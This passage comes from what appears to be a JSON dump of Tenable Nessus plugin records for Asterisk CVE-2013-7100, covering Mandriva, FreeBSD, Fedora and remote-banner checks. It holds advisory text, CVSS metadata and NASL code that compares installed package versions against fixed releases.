value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64asteriskssl1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-addons-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-devel-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-firmware-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", 
cpu:\"x86_64\", reference:\"asterisk-gui-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-alsa-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-calendar-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-cel-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-corosync-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-curl-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-dahdi-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-fax-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-festival-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ices-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jabber-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jack-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ldap-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-lua-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-minivm-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mobile-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mp3-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mysql-11.7.0-1.mbs1\")) 
flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ooh323-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-osp-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-oss-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pgsql-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pktccops-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-portaudio-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-radius-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-saycountpl-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-skinny-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-snmp-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-speex-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-sqlite-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-tds-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-unistim-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-imap-11.7.0-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-plain-11.7.0-1.mbs1\")) flag++;\nif 
(rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64asteriskssl1-11.7.0-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T15:02:49", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by the following vulnerabilities :\n\n - A denial of service vulnerability exists in the 'unpacksms16()' function of the 'app_sms.c' source file.\n When a 16-bit SMS message with an unusual message length value is received, an infinite loop will be created, causing a denial of service.\n\n - A privilege escalation vulnerability exists because of the way dialplan functions are handled during variable substitution. Privileged dialplan functions, such as the SHELL() and FILE() functions, can be used by external control protocols, such as the Asterisk Manager Interface and Asterisk Gateway Interface. 
A malicious, authenticated user could use these functions to modify arbitrary files or execute arbitrary commands.", "cvss3": {}, "published": "2013-12-19T00:00:00", "type": "nessus", "title": "Asterisk Multiple Vulnerabilities (AST-2013-006 / AST-2013-007)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_007.NASL", "href": "https://www.tenable.com/plugins/nessus/71538", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71538);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-7100\");\n script_bugtraq_id(64364, 64367);\n\n script_name(english:\"Asterisk Multiple Vulnerabilities (AST-2013-006 / AST-2013-007)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by the following\nvulnerabilities :\n\n - A denial of service vulnerability exists in the\n 'unpacksms16()' function of the 'app_sms.c' source file.\n When a 16-bit SMS message with an unusual message length\n value is received, an 
infinite loop will be created,\n causing a denial of service.\n\n - A privilege escalation vulnerability exists because of\n the way dialplan functions are handled during variable\n substitution. Privileged dialplan functions, such as\n the SHELL() and FILE() functions, can be used by\n external control protocols, such as the Asterisk Manager\n Interface and Asterisk Gateway Interface. A malicious,\n authenticated user could use these functions to modify\n arbitrary files or execute arbitrary commands.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-006.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-007.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-22590\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-22905\");\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-1.8.24.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5269580c\");\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-10.4.2\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?989ff925\");\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-11.6.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f8ef69c\");\n # http://downloads.asterisk.org/pub/telephony/certified-asterisk/releases/ChangeLog-1.8.15-cert4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b1df629a\");\n # http://downloads.asterisk.org/pub/telephony/certified-asterisk/releases/ChangeLog-11.2-cert3\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60d42add\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.24.1 / 10.12.4 / 11.6.1 / 
Certified Asterisk\n1.8.15-cert4 / 11.2-cert3, or apply the appropriate patches or\nworkaround contained in the Asterisk advisories.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-7100\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/19\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 10x < 10.12.4\n if (version =~ \"^10([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"10.12.4\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 11x < 11.6.1\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.6.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 
1.8.x < 1.8.24.1\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"1.8.24.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 1.8.15-cert4\n if (version =~ \"^1\\.8\\.15([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.15-cert4\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 11.2.x < 11.2-cert3\n if (version =~ \"^11\\.2([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"11.2-cert3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T15:02:50", "description": "The Asterisk project reports :\n\nA 16 bit SMS message that contains an odd message length value will cause the message decoding loop to run forever. 
The message buffer is not on the stack but will be overflowed resulting in corrupted memory and an immediate crash.\n\nExternal control protocols, such as the Asterisk Manager Interface, often have the ability to get and set channel variables; this allows the execution of dialplan functions. Dialplan functions within Asterisk are incredibly powerful, which is wonderful for building applications using Asterisk. But during the read or write execution, certain dialplan functions do much more. For example, reading the SHELL() function can execute arbitrary commands on the system Asterisk is running on. Writing to the FILE() function can change any file that Asterisk has write access to. When these functions are executed from an external protocol, that execution could result in a privilege escalation.", "cvss3": {}, "published": "2013-12-18T00:00:00", "type": "nessus", "title": "FreeBSD : asterisk -- multiple vulnerabilities (0c39bafc-6771-11e3-868f-0025905a4771)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:asterisk10", "p-cpe:/a:freebsd:freebsd:asterisk11", "p-cpe:/a:freebsd:freebsd:asterisk18", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_0C39BAFC677111E3868F0025905A4771.NASL", "href": "https://www.tenable.com/plugins/nessus/71506", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database 
:\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71506);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-7100\");\n\n script_name(english:\"FreeBSD : asterisk -- multiple vulnerabilities (0c39bafc-6771-11e3-868f-0025905a4771)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk project reports :\n\nA 16 bit SMS message that contains an odd message length value will\ncause the message decoding loop to run forever. The message buffer is\nnot on the stack but will be overflowed resulting in corrupted memory\nand an immediate crash.\n\nExternal control protocols, such as the Asterisk Manager Interface,\noften have the ability to get and set channel variables; this allows\nthe execution of dialplan functions. Dialplan functions within\nAsterisk are incredibly powerful, which is wonderful for building\napplications using Asterisk. But during the read or write execution,\ncertain diaplan functions do much more. For example, reading the\nSHELL() function can execute arbitrary commands on the system Asterisk\nis running on. 
Writing to the FILE() function can change any file that\nAsterisk has write access to. When these functions are executed from\nan external protocol, that execution could result in a privilege\nescalation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-006.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-007.pdf\"\n );\n # https://www.asterisk.org/security\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.asterisk.org/downloads/security-advisories\"\n );\n # https://vuxml.freebsd.org/freebsd/0c39bafc-6771-11e3-868f-0025905a4771.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f6d7329d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk18\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"asterisk10<10.12.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk11<11.6.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk18<1.8.24.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-18T14:26:45", "description": "- Sat Dec 28 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.7.0-1 :\n\n - The Asterisk Development Team has announced the release of Asterisk 11.7.0.\n\n - This release is available for immediate download at\n\n - http://downloads.asterisk.org/pub/telephony/asterisk\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-01-09T00:00:00", "type": "nessus", "title": "Fedora 18 : asterisk-11.7.0-1.fc18 (2013-24142)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:18"], "id": "FEDORA_2013-24142.NASL", "href": "https://www.tenable.com/plugins/nessus/71871", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-24142.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71871);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7100\");\n script_xref(name:\"FEDORA\", value:\"2013-24142\");\n\n script_name(english:\"Fedora 18 : asterisk-11.7.0-1.fc18 (2013-24142)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Sat Dec 28 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.7.0-1 :\n\n - The Asterisk Development Team has announced the\n release of Asterisk 
11.7.0.\n\n - This release is available for immediate download at\n\n - http://downloads.asterisk.org/pub/telephony/asterisk\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1043917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1043918\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125875.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?08195ef2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 